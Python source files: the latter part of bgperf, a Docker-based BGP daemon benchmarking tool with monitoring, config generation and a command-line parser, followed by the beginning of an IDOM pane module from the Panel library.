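# like ['100.0.0.0/32', '100.0.0.1/32', '100.0.0.2/32'] (illustrative; later calls
# continue from wherever the shared iterator left off).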
def rm_line():
#print('\x1b[1A\x1b[2K\x1b[1D\x1b[1A')
pass
def gc_thresh3():
gc_thresh3 = '/proc/sys/net/ipv4/neigh/default/gc_thresh3'
with open(gc_thresh3) as f:
return int(f.read().strip())
def doctor(args):
ver = dckr.version()['Version']
if ver.endswith('-ce'):
curr_version = version.parse(ver.replace('-ce', ''))
else:
curr_version = version.parse(ver)
min_version = version.parse('1.9.0')
ok = curr_version >= min_version
print('docker version ... {1} ({0})'.format(ver, 'ok' if ok else 'update to {} at least'.format(min_version)))
print('bgperf image', end=' ')
if img_exists('bgperf/exabgp'):
print('... ok')
else:
print('... not found. run `bgperf prepare`')
for name in ['gobgp', 'bird', 'frr', 'frr_c', 'rustybgp', 'openbgp']:
print('{0} image'.format(name), end=' ')
if img_exists('bgperf/{0}'.format(name)):
print('... ok')
else:
print('... not found. if you want to bench {0}, run `bgperf prepare`'.format(name))
print('/proc/sys/net/ipv4/neigh/default/gc_thresh3 ... {0}'.format(gc_thresh3()))
def prepare(args):
ExaBGP.build_image(args.force, nocache=args.no_cache)
ExaBGP_MRTParse.build_image(args.force, nocache=args.no_cache)
GoBGP.build_image(args.force, nocache=args.no_cache)
BIRD.build_image(args.force, nocache=args.no_cache)
FRRouting.build_image(args.force, nocache=args.no_cache)
RustyBGP.build_image(args.force, nocache=args.no_cache)
OpenBGP.build_image(args.force, nocache=args.no_cache)
#FRRoutingCompiled.build_image(args.force, nocache=args.no_cache)
# don't want to build this one automatically; it's special, so it has to be
# updated explicitly
def update(args):
if args.image == 'all' or args.image == 'exabgp':
ExaBGP.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'exabgp_mrtparse':
ExaBGP_MRTParse.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'gobgp':
GoBGP.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'bird':
BIRD.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'frr':
FRRouting.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'rustybgp':
RustyBGP.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'all' or args.image == 'openbgp':
OpenBGP.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'frr_c':
FRRoutingCompiled.build_image(True, checkout=args.checkout, nocache=args.no_cache)
if args.image == 'bgpdump2':
Bgpdump2.build_image(True, checkout=args.checkout, nocache=args.no_cache)
def remove_target_containers():
for target_class in [BIRDTarget, GoBGPTarget, FRRoutingTarget, FRRoutingCompiledTarget, RustyBGPTarget, OpenBGPTarget]:
if ctn_exists(target_class.CONTAINER_NAME):
print('removing target container', target_class.CONTAINER_NAME)
dckr.remove_container(target_class.CONTAINER_NAME, force=True)
def remove_old_containers():
if ctn_exists(Monitor.CONTAINER_NAME):
print('removing monitor container', Monitor.CONTAINER_NAME)
dckr.remove_container(Monitor.CONTAINER_NAME, force=True)
for ctn_name in get_ctn_names():
if ctn_name.startswith(ExaBGPTester.CONTAINER_NAME_PREFIX) or \
ctn_name.startswith(ExaBGPMrtTester.CONTAINER_NAME_PREFIX) or \
ctn_name.startswith(GoBGPMRTTester.CONTAINER_NAME_PREFIX) or \
ctn_name.startswith(Bgpdump2Tester.CONTAINER_NAME_PREFIX) or \
ctn_name.startswith(BIRDTester.CONTAINER_NAME_PREFIX):
print('removing tester container', ctn_name)
dckr.remove_container(ctn_name, force=True)
def controller_idle_percent(queue):
'''collect stats on the whole machine that is running the tests'''
stop_monitoring = False
def stats():
output = {}
output['who'] = 'controller'
while True:
if stop_monitoring == True:
return
utilization = check_output(['mpstat', '1' ,'1']).decode('utf-8').split('\n')[3]
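# parse the system-wide 'all' row of mpstat output; the regex below captures the
# trailing float on that row, which this script records as the idle percentage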
g = re.match(r'.*all\s+.*\d+\s+(\d+\.\d+)', utilization).groups()
output['idle'] = float(g[0])
output['time'] = datetime.datetime.now()
queue.put(output)
# don't sleep because mpstat already takes 1 second to run
t = Thread(target=stats)
t.daemon = True
t.start()
def controller_memory_free(queue):
'''collect stats on the whole machine that is running the tests'''
stop_monitoring = False
def stats():
output = {}
output['who'] = 'controller'
while True:
if stop_monitoring == True:
return
free = check_output(['free', '-m']).decode('utf-8').split('\n')[1]
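# parse the memory row of `free -m`; the regex below captures the last numeric
# column, which this script records (converted from MB to bytes) as free memory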
g = re.match(r'.*\d+\s+(\d+)', free).groups()
output['free'] = float(g[0]) * 1024 * 1024
output['time'] = datetime.datetime.now()
queue.put(output)
time.sleep(1)
t = Thread(target=stats)
t.daemon = True
t.start()
stop_monitoring = False
def bench(args):
output_stats = {}
config_dir = '{0}/{1}'.format(args.dir, args.bench_name)
dckr_net_name = args.docker_network_name or args.bench_name + '-br'
remove_target_containers()
if not args.repeat:
remove_old_containers()
if os.path.exists(config_dir):
shutil.rmtree(config_dir)
bench_start = time.time()
if args.file:
with open(args.file) as f:
conf = yaml.safe_load(Template(f.read()).render())
else:
conf = gen_conf(args)
if not os.path.exists(config_dir):
os.makedirs(config_dir)
with open('{0}/scenario.yaml'.format(config_dir), 'w') as f:
f.write(conf)
conf = yaml.safe_load(Template(conf).render())
bridge_found = False
for network in dckr.networks(names=[dckr_net_name]):
if network['Name'] == dckr_net_name:
print('Docker network "{}" already exists'.format(dckr_net_name))
bridge_found = True
break
if not bridge_found:
subnet = conf['local_prefix']
print('creating Docker network "{}" with subnet {}'.format(dckr_net_name, subnet))
ipam = IPAMConfig(pool_configs=[IPAMPool(subnet=subnet)])
network = dckr.create_network(dckr_net_name, driver='bridge', ipam=ipam)
num_tester = sum(len(t.get('neighbors', [])) for t in conf.get('testers', []))
if num_tester > gc_thresh3():
print('gc_thresh3 ({0}) is lower than the number of peers ({1})'.format(gc_thresh3(), num_tester))
print('run the following to increase the value:')
print('$ echo 16384 | sudo tee /proc/sys/net/ipv4/neigh/default/gc_thresh3')
print('run monitor')
m = Monitor(config_dir+'/monitor', conf['monitor'])
m.run(conf, dckr_net_name)
## I'd prefer to start up the testers and then start up the target;
# however, bgpdump2 isn't smart enough to wait and retry connections, so
# this is the order
testers = []
if not args.repeat:
valid_indexes = None
asns = None
for idx, tester in enumerate(conf['testers']):
if 'name' not in tester:
name = 'tester{0}'.format(idx)
else:
name = tester['name']
if 'type' not in tester:
tester_type = 'normal'
else:
tester_type = tester['type']
if tester_type == 'normal':
tester_class = ExaBGPTester
elif tester_type == 'bird':
tester_class = BIRDTester
elif tester_type == 'mrt':
if 'mrt_injector' not in tester:
mrt_injector = 'gobgp'
else:
mrt_injector = tester['mrt_injector']
if mrt_injector == 'gobgp':
tester_class = GoBGPMRTTester
elif mrt_injector == 'exabgp':
tester_class = ExaBGPMrtTester
elif mrt_injector == 'bgpdump2':
tester_class = Bgpdump2Tester
else:
print('invalid mrt_injector:', mrt_injector)
sys.exit(1)
else:
print('invalid tester type:', tester_type)
sys.exit(1)
t = tester_class(name, config_dir+'/'+name, tester)
print('run tester', name, 'type', tester_type)
t.run(conf['target'], dckr_net_name)
testers.append(t)
# have to do some extra stuff with bgpdump2
# because it's sending real data, we need to figure out
# which neighbor has data and what the actual ASN is
if tester_type == 'mrt' and mrt_injector == 'bgpdump2' and not valid_indexes:
print("finding asns and such from mrt file")
valid_indexes = t.get_index_valid(args.prefix_num)
asns = t.get_index_asns()
for test in conf['testers']:
test['bgpdump-index'] = valid_indexes[test['mrt-index'] % len(valid_indexes)]
neighbor = next(iter(test['neighbors'].values()))
neighbor['as'] = asns[test['bgpdump-index']]
# TODO: this needs to all be moved to its own object and file
# so this stuff isn't copied around
str_conf = gen_mako_macro() + yaml.dump(conf, default_flow_style=False)
with open('{0}/scenario.yaml'.format(config_dir), 'w') as f:
f.write(str_conf)
is_remote = True if 'remote' in conf['target'] and conf['target']['remote'] else False
if is_remote:
print('target is remote ({})'.format(conf['target']['local-address']))
ip = IPRoute()
# r: route to the target
r = ip.get_routes(dst=conf['target']['local-address'], family=AF_INET)
if len(r) == 0:
print('no route to remote target {0}'.format(conf['target']['local-address']))
sys.exit(1)
# intf: interface used to reach the target
idx = [t[1] for t in r[0]['attrs'] if t[0] == 'RTA_OIF'][0]
intf = ip.get_links(idx)[0]
intf_name = intf.get_attr('IFLA_IFNAME')
# raw_bridge_name: Linux bridge name of the Docker bridge
# TODO: not sure if the linux bridge name is always given by
# "br-<first 12 characters of Docker network ID>".
raw_bridge_name = args.bridge_name or 'br-{}'.format(network['Id'][0:12])
# raw_bridges: list of Linux bridges that match raw_bridge_name
raw_bridges = ip.link_lookup(ifname=raw_bridge_name)
if len(raw_bridges) == 0:
if not args.bridge_name:
print(('can\'t determine the Linux bridge interface name starting '
'from the Docker network {}'.format(dckr_net_name)))
else:
print(('the Linux bridge name provided ({}) seems nonexistent'.format(
raw_bridge_name)))
print(('Since the target is remote, the host interface used to '
'reach the target ({}) must be part of the Linux bridge '
'used by the Docker network {}, but without the correct Linux '
'bridge name it\'s impossible to verify if that\'s true'.format(
intf_name, dckr_net_name)))
if not args.bridge_name:
print(('Please supply the Linux bridge name corresponding to the '
'Docker network {} using the --bridge-name argument.'.format(
dckr_net_name)))
sys.exit(1)
# intf_bridge: bridge interface that intf is already member of
intf_bridge = intf.get_attr('IFLA_MASTER')
# if intf is not member of the bridge, add it
if intf_bridge not in raw_bridges:
if intf_bridge is None:
print(('Since the target is remote, the host interface used to '
'reach the target ({}) must be part of the Linux bridge '
'used by the Docker network {}'.format(
intf_name, dckr_net_name)))
sys.stdout.write('Do you confirm to add the interface {} '
'to the bridge {}? [yes/NO] '.format(
intf_name, raw_bridge_name
))
try:
answer = input()
except:
print('aborting')
sys.exit(1)
answer = answer.strip()
if answer.lower() != 'yes':
print('aborting')
sys.exit(1)
print('adding interface {} to the bridge {}'.format(
intf_name, raw_bridge_name
))
br = raw_bridges[0]
try:
ip.link('set', index=idx, master=br)
except Exception as e:
print(('Something went wrong: {}'.format(str(e))))
print(('Please consider running the following command to '
'add the {iface} interface to the {br} bridge:\n'
' sudo brctl addif {br} {iface}'.format(
iface=intf_name, br=raw_bridge_name)))
print('\n\n\n')
raise
else:
curr_bridge_name = ip.get_links(intf_bridge)[0].get_attr('IFLA_IFNAME')
print(('the interface used to reach the target ({}) '
'is already member of the bridge {}, which is not '
'the one used in this configuration'.format(
intf_name, curr_bridge_name)))
print(('Please consider running the following command to '
'remove the {iface} interface from the {br} bridge:\n'
' sudo brctl addif {br} {iface}'.format(
iface=intf_name, br=curr_bridge_name)))
sys.exit(1)
else:
if args.target == 'gobgp':
target_class = GoBGPTarget
elif args.target == 'bird':
target_class = BIRDTarget
elif args.target == 'frr':
target_class = FRRoutingTarget
elif args.target == 'frr_c':
target_class = FRRoutingCompiledTarget
elif args.target == 'rustybgp':
target_class = RustyBGPTarget
elif args.target == 'openbgp':
target_class = OpenBGPTarget
else:
print(f"incorrect target {args.target}")
print('run', args.target)
if args.image:
target = target_class('{0}/{1}'.format(config_dir, args.target), conf['target'], image=args.image)
else:
target = target_class('{0}/{1}'.format(config_dir, args.target), conf['target'])
target.run(conf, dckr_net_name)
time.sleep(1)
output_stats['monitor_wait_time'] = m.wait_established(conf['target']['local-address'])
output_stats['cores'], output_stats['memory'] = get_hardware_info()
start = datetime.datetime.now()
q = Queue()
m.stats(q)
controller_idle_percent(q)
controller_memory_free(q)
if not is_remote:
target.stats(q)
target.neighbor_stats(q)
# want to launch all the neighbors at the same(ish) time;
# launch them after the test starts because as soon as they start they can send info, at least for mrt
# does it need to be in a different place for mrt than exabgp?
for i in range(len(testers)):
testers[i].launch()
if i > 0:
rm_line()
print(f"launched {i+1} testers")
if args.prefix_num >= 100_000:
time.sleep(1)
f = open(args.output, 'w') if args.output else None
cpu = 0
mem = 0
output_stats['max_cpu'] = 0
output_stats['max_mem'] = 0
output_stats['first_received_time'] = 0
output_stats['min_idle'] = 100
output_stats['min_free'] = 1_000_000_000_000_000
neighbors_checked = 0
percent_idle = 0
mem_free = 0
recved_checkpoint = False
neighbors_checkpoint = False
while True:
info = q.get()
if not is_remote and info['who'] == target.name:
if 'neighbors_checked' in info:
if all(value == True for value in info['neighbors_checked'].values()):
neighbors_checked = sum(1 if value == True else 0 for value in info['neighbors_checked'].values())
neighbors_checkpoint = True
else:
neighbors_checked = sum(1 if value == True else 0 for value in info['neighbors_checked'].values())
else:
cpu = info['cpu']
mem = info['mem']
output_stats['max_cpu'] = cpu if cpu > output_stats['max_cpu'] else output_stats['max_cpu']
output_stats['max_mem'] = mem if mem > output_stats['max_mem'] else output_stats['max_mem']
if info['who'] == 'controller':
if 'free' in info:
mem_free = info['free']
output_stats['min_free'] = mem_free if mem_free < output_stats['min_free'] else output_stats['min_free']
elif 'idle' in info:
percent_idle = info['idle']
output_stats['min_idle'] = percent_idle if percent_idle < output_stats['min_idle'] else output_stats['min_idle']
if info['who'] == m.name:
elapsed = info['time'] - start
output_stats['elapsed'] = elapsed
recved = info['afi_safis'][0]['state']['accepted'] if 'accepted' in info['afi_safis'][0]['state'] else 0
if elapsed.seconds > 0:
rm_line()
print('elapsed: {0}sec, cpu: {1:>4.2f}%, mem: {2}, mon recved: {3}, neighbors: {4}, %idle {5}, free mem {6}'.format(elapsed.seconds, cpu, mem_human(mem), recved, neighbors_checked, percent_idle, mem_human(mem_free)))
f.write('{0}, {1}, {2}, {3}\n'.format(elapsed.seconds, cpu, mem, recved)) if f else None
f.flush() if f else None
if recved > 0 and output_stats['first_received_time'] == 0:
output_stats['first_received_time'] = elapsed
if recved_checkpoint and neighbors_checkpoint:
output_stats['recved'] = recved
f.close() if f else None
return finish_bench(args, output_stats, bench_start,target, m)
if info['checked']:
recved_checkpoint = True
def finish_bench(args, output_stats, bench_start,target, m):
bench_stop = time.time()
output_stats['total_time'] = bench_stop - bench_start
m.stop_monitoring = True
target.stop_monitoring = True
stop_monitoring = True
target_version = target.exec_version_cmd()
print_final_stats(args, target_version, output_stats)
o_s = create_output_stats(args, target_version, output_stats)
print(stats_header())
print(','.join(map(str, o_s)))
print()
# it would be better to clean things up, but often I want to investigate where things ended up
# remove_old_containers()
# remove_target_containers()
return o_s
def print_final_stats(args, target_version, stats):
print(f"{args.target}: {target_version}")
print(f"Max cpu: {stats['max_cpu']:4.2f}, max mem: {mem_human(stats['max_mem'])}")
print(f"Min %idle {stats['min_idle']}, Min mem free {mem_human(stats['min_free'])}")
print(f"Time since first received prefix: {stats['elapsed'].seconds - stats['first_received_time'].seconds}")
print(f"total time: {stats['total_time']:.2f}s")
print()
def stats_header():
return("name, target, version, peers, prefixes per peer, received, monitor (s), elapsed (s), prefix received (s), testers (s), total time, max cpu %, max mem (GB), min idle%, min free mem (GB), flags, date,cores,Mem (GB)")
def create_output_stats(args, target_version, stats):
e = stats['elapsed'].seconds
f = stats['first_received_time'].seconds
d = datetime.date.today().strftime("%Y-%m-%d")
if 'label' in args and args.label:
name = args.label
else:
name = args.target
out = [name, args.target, target_version, str(args.neighbor_num), str(args.prefix_num)]
out.extend([stats['recved']])
out.extend([stats['monitor_wait_time'], e, f , e-f, float(format(stats['total_time'], ".2f"))])
out.extend([round(stats['max_cpu']), float(format(stats['max_mem']/1024/1024/1024, ".3f"))])
out.extend ([round(stats['min_idle']), float(format(stats['min_free']/1024/1024/1024, ".3f"))])
out.extend(['-s' if args.single_table else '', d, str(stats['cores']), mem_human(stats['memory'])])
return out
def create_graph(stats, test_name='total time', stat_index=8, test_file='total_time.png', ylabel='seconds'):
labels = {}
data = defaultdict(list)
for stat in stats:
labels[stat[0]] = True
data[f"{stat[3]}n_{stat[4]}p"].append(float(stat[stat_index]))
x = np.arange(len(labels))
bars = len(data)
width = 0.7 / bars
plt.figure()
for i, d in enumerate(data):
plt.bar(x -0.2+i*width, data[d], width=width, label=d)
plt.ylabel(ylabel)
#plt.xlabel('neighbors_prefixes')
plt.title(test_name)
plt.xticks(x,labels.keys())
plt.legend()
plt.show()
plt.savefig(test_file)
def batch(args):
""" runs several tests together, produces all the stats together and creates graphs
requires a yaml file to describe the batch of tests to run
it iterates through a list of targets, number of neighbors and number of prefixes
other variables can be set, but not iterated through
"""
with open(args.batch_config, 'r') as f:
batch_config = yaml.safe_load(f)
for test in batch_config['tests']:
results = []
for n in test['neighbors']:
for p in test['prefixes']:
for t in test['targets']:
a = argparse.Namespace(**vars(args))
a.func = bench
a.image = None
a.output = None
a.target = t['name']
a.prefix_num = p
a.neighbor_num = n
# read any config attribute that was specified in the yaml batch file
a.local_address_prefix = t['local_address_prefix'] if 'local_address_prefix' in t else '10.10.0.0/16'
for field in ['single_table', 'docker_network_name', 'repeat', 'file', 'target_local_address',
'label', 'target_local_address', 'monitor_local_address', 'target_router_id',
'monitor_router_id', 'target_config_file', 'filter_type','mrt_injector', 'mrt_file']:
setattr(a, field, t[field]) if field in t else setattr(a, field, None)
for field in ['as_path_list_num', 'prefix_list_num', 'community_list_num', 'ext_community_list_num']:
setattr(a, field, t[field]) if field in t else setattr(a, field, 0)
results.append(bench(a))
# update this each time in case something crashes
with open(f"{test['name']}.csv", 'w') as f:
f.write(stats_header() + '\n')
for stat in results:
f.write(','.join(map(str, stat)) + '\n')
print()
print(stats_header())
for stat in results:
print(','.join(map(str, stat)))
create_batch_graphs(results, test['name'])
def create_batch_graphs(results, name):
create_graph(results, test_name='total time', stat_index=10, test_file=f"bgperf_{name}_total_time.png")
create_graph(results, test_name='elapsed', stat_index=7, test_file=f"bgperf_{name}_elapsed.png")
create_graph(results, test_name='neighbor', stat_index=6, test_file=f"bgperf_{name}_neighbor.png")
create_graph(results, test_name='route reception', stat_index=9, test_file=f"bgperf_{name}_route_reception.png")
create_graph(results, test_name='max cpu', stat_index=11, test_file=f"bgperf_{name}_max_cpu.png", ylabel="%")
create_graph(results, test_name='max mem', stat_index=12, test_file=f"bgperf_{name}_max_mem.png", ylabel="GB")
def mem_human(v):
if v > 1024 * 1024 * 1024:
return '{0:.2f}GB'.format(float(v) / (1024 * 1024 * 1024))
elif v > 1024 * 1024:
return '{0:.2f}MB'.format(float(v) / (1024 * 1024))
elif v > 1024:
return '{0:.2f}KB'.format(float(v) / 1024)
else:
return '{0:.2f}B'.format(float(v))
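# Example (illustrative): mem_human(3 * 1024 * 1024 * 1024) returns '3.00GB'
# and mem_human(512) returns '512.00B'.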
def get_hardware_info():
cores = os.cpu_count()
mem = virtual_memory().total
return cores, mem
def gen_conf(args):
''' This creates the scenario.yml that other things need to read to produce device config
'''
neighbor_num = args.neighbor_num
prefix = args.prefix_num
as_path_list = args.as_path_list_num
prefix_list = args.prefix_list_num
community_list = args.community_list_num
ext_community_list = args.ext_community_list_num
mrt_injector = args.mrt_injector
local_address_prefix = netaddr.IPNetwork(args.local_address_prefix)
if args.target_local_address:
target_local_address = netaddr.IPAddress(args.target_local_address)
else:
target_local_address = local_address_prefix.broadcast - 1
if args.monitor_local_address:
monitor_local_address = netaddr.IPAddress(args.monitor_local_address)
else:
monitor_local_address = local_address_prefix.ip + 2
if args.target_router_id:
target_router_id = netaddr.IPAddress(args.target_router_id)
else:
target_router_id = target_local_address
if args.monitor_router_id:
monitor_router_id = netaddr.IPAddress(args.monitor_router_id)
else:
monitor_router_id = monitor_local_address
conf = {}
conf['local_prefix'] = str(local_address_prefix)
conf['target'] = {
'as': 1000,
'router-id': str(target_router_id),
'local-address': str(target_local_address),
'single-table': args.single_table,
}
if args.target_config_file:
conf['target']['config_path'] = args.target_config_file
conf['monitor'] = {
'as': 1001,
'router-id': str(monitor_router_id),
'local-address': str(monitor_local_address),
'check-points': [prefix * neighbor_num],
}
if args.mrt_injector:
conf['monitor']['check-points'] = [prefix]
if args.mrt_injector == 'gobgp': #gobgp doesn't send everything with mrt
conf['monitor']['check-points'][0] = int(conf['monitor']['check-points'][0] * 0.93)
elif args.target == 'bird': # bird seems to reject several handfuls of routes
conf['monitor']['check-points'][0] = int(conf['monitor']['check-points'][0] * 0.99)
it = netaddr.iter_iprange('90.0.0.0', '100.0.0.0')
conf['policy'] = {}
assignment = []
if prefix_list > 0:
name = 'p1'
conf['policy'][name] = {
'match': [{
'type': 'prefix',
'value': list('{0}/32'.format(ip) for ip in islice(it, prefix_list)),
}],
}
assignment.append(name)
if as_path_list > 0:
name = 'p2'
conf['policy'][name] = {
'match': [{
'type': 'as-path',
'value': list(range(10000, 10000 + as_path_list)),
}],
}
assignment.append(name)
if community_list > 0:
name = 'p3'
conf['policy'][name] = {
'match': [{
'type': 'community',
'value': list('{0}:{1}'.format(int(i/(1<<16)), i%(1<<16)) for i in range(community_list)),
}],
}
assignment.append(name)
if ext_community_list > 0:
name = 'p4'
conf['policy'][name] = {
'match': [{
'type': 'ext-community',
'value': list('rt:{0}:{1}'.format(int(i/(1<<16)), i%(1<<16)) for i in range(ext_community_list)),
}],
}
assignment.append(name)
neighbors = {}
configured_neighbors_cnt = 0
for i in range(3, neighbor_num+3+2):
if configured_neighbors_cnt == neighbor_num:
break
curr_ip = local_address_prefix.ip + i
if curr_ip in [target_local_address, monitor_local_address]:
print(('skipping tester\'s neighbor with IP {} because it collides with target or monitor'.format(curr_ip)))
continue
router_id = str(local_address_prefix.ip + i)
neighbors[router_id] = {
'as': 1000 + i,
'router-id': router_id,
'local-address': router_id,
'paths': '${{gen_paths({0})}}'.format(prefix),
'count': prefix,
'check-points': prefix,
'filter': {
args.filter_type: assignment,
},
}
configured_neighbors_cnt += 1
if not mrt_injector:
conf['testers'] = [{
'name': 'tester',
'type': 'bird',
'neighbors': neighbors,
}]
else:
conf['testers'] = neighbor_num*[None]
mrt_file = args.mrt_file
if not mrt_file:
print("Need to provide an mrtfile to send")
exit(1)
for i in range(neighbor_num):
router_id = str(local_address_prefix.ip + i+3)
conf['testers'][i] = {
'name': f'mrt-injector{i}',
'type': 'mrt',
'mrt_injector': mrt_injector,
'mrt-index': i,
'neighbors': {
router_id: {
'as': 1000+i+3,
'local-address': router_id,
'router-id': router_id,
'mrt-file': mrt_file,
'only-best': True,
'count': prefix,
'check-points': int(conf['monitor']['check-points'][0])
}
}
}
yaml.Dumper.ignore_aliases = lambda *args : True
return gen_mako_macro() + yaml.dump(conf, default_flow_style=False)
def config(args):
conf = gen_conf(args)
with open(args.output, 'w') as f:
f.write(conf)
def create_args_parser(main=True):
parser = ArgumentParser(description='BGP performance measuring tool')
parser.add_argument('-b', '--bench-name', default='bgperf')
parser.add_argument('-d', '--dir', default='/tmp')
s = parser.add_subparsers()
parser_doctor = s.add_parser('doctor', help='check env')
parser_doctor.set_defaults(func=doctor)
parser_prepare = s.add_parser('prepare', help='prepare env')
parser_prepare.add_argument('-f', '--force', action='store_true', help='build even if the container already exists')
parser_prepare.add_argument('-n', '--no-cache', action='store_true')
parser_prepare.set_defaults(func=prepare)
parser_update = s.add_parser('update', help='rebuild bgp docker images')
parser_update.add_argument('image', choices=['exabgp', 'exabgp_mrtparse', 'gobgp', 'bird', 'frr', 'frr_c',
'rustybgp', 'openbgp', 'bgpdump2', 'all'])
parser_update.add_argument('-c', '--checkout', default='HEAD')
parser_update.add_argument('-n', '--no-cache', action='store_true')
parser_update.set_defaults(func=update)
def add_gen_conf_args(parser):
parser.add_argument('-n', '--neighbor-num', default=100, type=int)
parser.add_argument('-p', '--prefix-num', default=100, type=int)
parser.add_argument('-l', '--filter-type', choices=['in', 'out'], default='in')
parser.add_argument('-a', '--as-path-list-num', default=0, type=int)
parser.add_argument('-e', '--prefix-list-num', default=0, type=int)
parser.add_argument('-c', '--community-list-num', default=0, type=int)
parser.add_argument('-x', '--ext-community-list-num', default=0, type=int)
parser.add_argument('-s', '--single-table', action='store_true')
parser.add_argument('-m', '--mrt_injector', choices=[None, 'gobgp', 'bgpdump2'], default=None)
parser.add_argument('--mrt-file', type=str,
help='mrt file, requires absolute path')
parser.add_argument('--target-config-file', type=str,
help='target BGP daemon\'s configuration file')
parser.add_argument('--local-address-prefix', type=str, default='10.10.0.0/16',
help='IPv4 prefix used for local addresses; default: 10.10.0.0/16')
parser.add_argument('--target-local-address', type=str,
help='IPv4 address of the target; default: the last address of the '
'local prefix given in --local-address-prefix')
parser.add_argument('--target-router-id', type=str,
help='target\'s router ID; default: same as --target-local-address')
parser.add_argument('--monitor-local-address', type=str,
help='IPv4 address of the monitor; default: the second address of the '
'local prefix given in --local-address-prefix')
parser.add_argument('--monitor-router-id', type=str,
help='monitor\'s router ID; default: same as --monitor-local-address')
parser_bench = s.add_parser('bench', help='run benchmarks')
parser_bench.add_argument('-t', '--target', choices=['gobgp', 'bird', 'frr', 'frr_c', 'rustybgp', 'openbgp'], default='gobgp')
parser_bench.add_argument('-i', '--image', help='specify custom docker image')
parser_bench.add_argument('--docker-network-name', help='Docker network name; this is the name given by \'docker network ls\'')
parser_bench.add_argument('--bridge-name', help='Linux bridge name of the '
'interface corresponding to the Docker network; '
'use this argument only if bgperf can\'t '
'determine the Linux bridge name starting from '
'the Docker network name in case of tests of '
'remote targets.')
parser_bench.add_argument('-r', '--repeat', action='store_true', help='use existing tester/monitor container')
parser_bench.add_argument('-f', '--file', metavar='CONFIG_FILE')
parser_bench.add_argument('-o', '--output', metavar='STAT_FILE')
add_gen_conf_args(parser_bench)
parser_bench.set_defaults(func=bench)
parser_config = s.add_parser('config', help='generate config')
parser_config.add_argument('-o', '--output', default='bgperf.yml', type=str)
add_gen_conf_args(parser_config)
parser_config.set_defaults(func=config)
parser_batch = s.add_parser('batch', help='run batch benchmarks')
parser_batch.add_argument('-c', '--batch_config', type=str, help='batch config file')
parser_batch.set_defaults(func=batch)
return parser
if __name__ == '__main__':
parser = create_args_parser()
args = parser.parse_args()
try:
func = args.func
except AttributeError:
parser.error("too few arguments")
args.func(args)
|
idom.py
|
import sys
import asyncio
from functools import partial
from threading import Thread
from queue import Queue as SyncQueue
from packaging.version import Version
from ..io.notebook import push_on_root
from ..io.resources import DIST_DIR, LOCAL_DIST
from ..io.state import state
from ..models import IDOM as _BkIDOM
from .base import PaneBase
_IDOM_MIN_VER = "0.23"
_IDOM_MAX_VER = "0.24"
def _spawn_threaded_event_loop(coro):
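# Run `coro` on a fresh asyncio event loop inside a daemon thread and hand the
# running loop back to the caller once it is available.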
loop_q = SyncQueue()
def run_in_thread():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop_q.put(loop)
loop.run_until_complete(coro)
thread = Thread(target=run_in_thread, daemon=True)
thread.start()
return loop_q.get()
class IDOM(PaneBase):
priority = None
_updates = True
_unpack = True
_bokeh_model = _BkIDOM
def __init__(self, object=None, **params):
from idom import __version__ as idom_version
if Version(idom_version) < Version(_IDOM_MIN_VER) or Version(idom_version) >= Version(_IDOM_MAX_VER):
raise RuntimeError(
f"Expected idom>={_IDOM_MIN_VER},<{_IDOM_MAX_VER}, but found {idom_version}"
)
super().__init__(object, **params)
self._idom_loop = None
self._idom_model = {}
self.param.watch(self._update_layout, 'object')
def _update_layout(self, *args):
self._idom_model = {}
if self._idom_loop is None:
return
self._setup()
def _setup(self):
if self.object is None:
return
from idom.core.component import Component
from idom.core.layout import Layout
if isinstance(self.object, Layout):
self._idom_layout = self.object
elif isinstance(self.object, Component):
self._idom_layout = Layout(self.object)
else:
self._idom_layout = Layout(self.object())
self._idom_loop = _spawn_threaded_event_loop(self._idom_layout_render_loop())
def _get_model(self, doc, root=None, parent=None, comm=None):
from idom.core.layout import LayoutUpdate
from idom.config import IDOM_CLIENT_IMPORT_SOURCE_URL
# let the client determine import source location
IDOM_CLIENT_IMPORT_SOURCE_URL.set("./")
if comm:
url = '/panel_dist/idom'
else:
url = '/'+LOCAL_DIST+'idom'
if self._idom_loop is None:
self._setup()
update = LayoutUpdate.create_from({}, self._idom_model)
props = self._init_params()
model = self._bokeh_model(
event=[update.path, update.changes], importSourceUrl=url, **props
)
if root is None:
root = model
self._link_props(model, ['msg'], doc, root, comm)
if root is None:
root = model
self._models[root.ref['id']] = (model, parent)
return model
def _cleanup(self, root):
super()._cleanup(root)
if not self._models:
# Clean up loop when no views are shown
try:
self._idom_loop.stop()
finally:
self._idom_loop = None
self._idom_layout = None
def _process_property_change(self, msg):
if msg['msg'] is None:
return {}
from idom.core.layout import LayoutEvent
dispatch = self._idom_layout.dispatch(LayoutEvent(**msg['msg']))
asyncio.run_coroutine_threadsafe(dispatch, loop=self._idom_loop)
for ref, (m, _) in self._models.items():
m.msg = None
push_on_root(ref)
return {}
async def _idom_layout_render_loop(self):
async with self._idom_layout:
while True:
update = await self._idom_layout.render()
self._idom_model = update.apply_to(self._idom_model)
for ref, (model, _) in self._models.items():
doc = state._views[ref][2]
if doc.session_context:
doc.add_next_tick_callback(partial(model.update, event=update))
else:
model.event = update
push_on_root(ref)
@classmethod
def applies(cls, object):
from idom.core.component import Component
from idom.core.layout import Layout
if 'idom' in sys.modules:
if isinstance(object, (Component, Layout)):
return 0.8
elif callable(object):
return None
return False
@classmethod
def install(cls, packages, ignore_installed=False, fallback=None):
"""
Installs specified packages into application directory.
Arguments
---------
packages: list or tuple
The packages to install from npm
ignore_installed: boolean
Whether to ignore if the package was previously installed.
fallback: str or idom.component
The fallback to display while the component is loading
"""
import idom
from idom.config import IDOM_CLIENT_BUILD_DIR
idom_dist_dir = DIST_DIR / "idom"
if IDOM_CLIENT_BUILD_DIR.get() != idom_dist_dir:
IDOM_CLIENT_BUILD_DIR.set(idom_dist_dir)
# just in case packages were already installed but the build hasn't been
# copied over to DIST_DIR yet.
ignore_installed = True
return idom.install(packages, ignore_installed, fallback)
@classmethod
def use_param(cls, parameter):
"""
Links parameter to some IDOM state value and returns the linked
value.
Arguments
---------
